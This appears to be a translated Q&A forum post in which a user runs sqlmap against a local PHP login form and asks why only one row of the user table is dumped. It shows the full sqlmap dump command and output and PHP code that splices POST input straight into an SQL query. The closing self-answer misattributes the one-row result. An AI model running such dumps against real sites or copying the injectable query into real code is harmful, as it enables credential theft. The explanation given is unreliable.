Php
POST sql 注入中未顯示整個數據
sqlmap -u "http://192.168.0.106/get_method/get_data_login/" --data="name=name&password=pass" -D get_method -T user --dump輸出 :
[11:27:40] [INFO] the back-end DBMS is MySQL web application technology: PHP 7.3.27, Apache 2.4.46 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [11:27:40] [INFO] fetching columns for table 'user' in database 'get_method' [11:27:40] [INFO] resumed: 'serial' [11:27:40] [INFO] resumed: 'int(255)' [11:27:40] [INFO] resumed: 'name' [11:27:40] [INFO] resumed: 'varchar(255)' [11:27:40] [INFO] resumed: 'password' [11:27:40] [INFO] resumed: 'varchar(255)' [11:27:40] [INFO] resumed: 'timestamp' [11:27:40] [INFO] resumed: 'timestamp' [11:27:40] [INFO] fetching entries for table 'user' in database 'get_method' [11:27:40] [INFO] resumed: '2021-03-26 11:21:25' [11:27:40] [INFO] resumed: 'hello' [11:27:40] [INFO] resumed: 'hey' [11:27:40] [INFO] resumed: '222' Database: get_method Table: user [1 entry] +-------+--------+----------+---------------------+ | name | serial | password | timestamp | +-------+--------+----------+---------------------+ | hello | 222 | hey | 2021-03-26 11:21:25 | +-------+--------+----------+---------------------+ [11:27:40] [INFO] table 'get_method.`user`' dumped to CSV file '/home/istiak/.local/share/sqlmap/output/192.168.0.106/dump/get_method/user.csv' [11:27:40] [INFO] fetched data logged to text files under '/home/istiak/.local/share/sqlmap/output/192.168.0.106' [*] ending @ 11:27:40 /2021-03-26/
php程式碼 :include 'connection.php'; if($_SERVER['REQUEST_METHOD']=='POST'){ $name=$_POST['name']; $password=$_POST['password']; $query = mysqli_query($con,"SELECT * FROM `user` WHERE `name`='$name' && `password`='$password'"); $rows = mysqli_num_rows($query); if($rows==0){ echo "failure"; }else{ echo "succeed"; } } mysqli_close($con);問題是當我執行此程式碼
sqlmap -u "http://192.168.0.106/get_method/get_data_login/" --data="name=name&password=pass" -D get_method -T user --dump時,它正在發送data="name=name&password=pass",而數據庫中沒有數據而且,當我執行該程式碼時,我只得到一個數據。
+-------+--------+----------+---------------------+ | name | serial | password | timestamp | +-------+--------+----------+---------------------+ | hello | 222 | hey | 2021-03-26 11:21:25 | +-------+--------+----------+---------------------+為什麼我無法獲取所有數據?我也試過這個
sqlmap -u "http://192.168.0.106/get_method/get_data_login/" --data="name=hello&password=hey" -D get_method -T user --dump雖然我得到了相同的輸出..
先看你的
php程式碼include 'connection.php'; if($_SERVER['REQUEST_METHOD']=='POST'){ $name=$_POST['name']; $password=$_POST['password']; $query = mysqli_query($con,"SELECT * FROM `user` WHERE `name`='$name' && `password`='$password'"); $rows = mysqli_num_rows($query); if($rows==0){ echo "failure"; }else{ echo "succeed"; } } mysqli_close($con);無論我將發送到該文件的什麼,它現在只會檢查
sql程式碼。SELECT * FROMuserWHEREname='$name' &&password='$password'從使用者表中選擇 name=“whatever user send” 和 password=“whatever user send” 的所有內容。這就是為什麼我沒有所有列表的原因。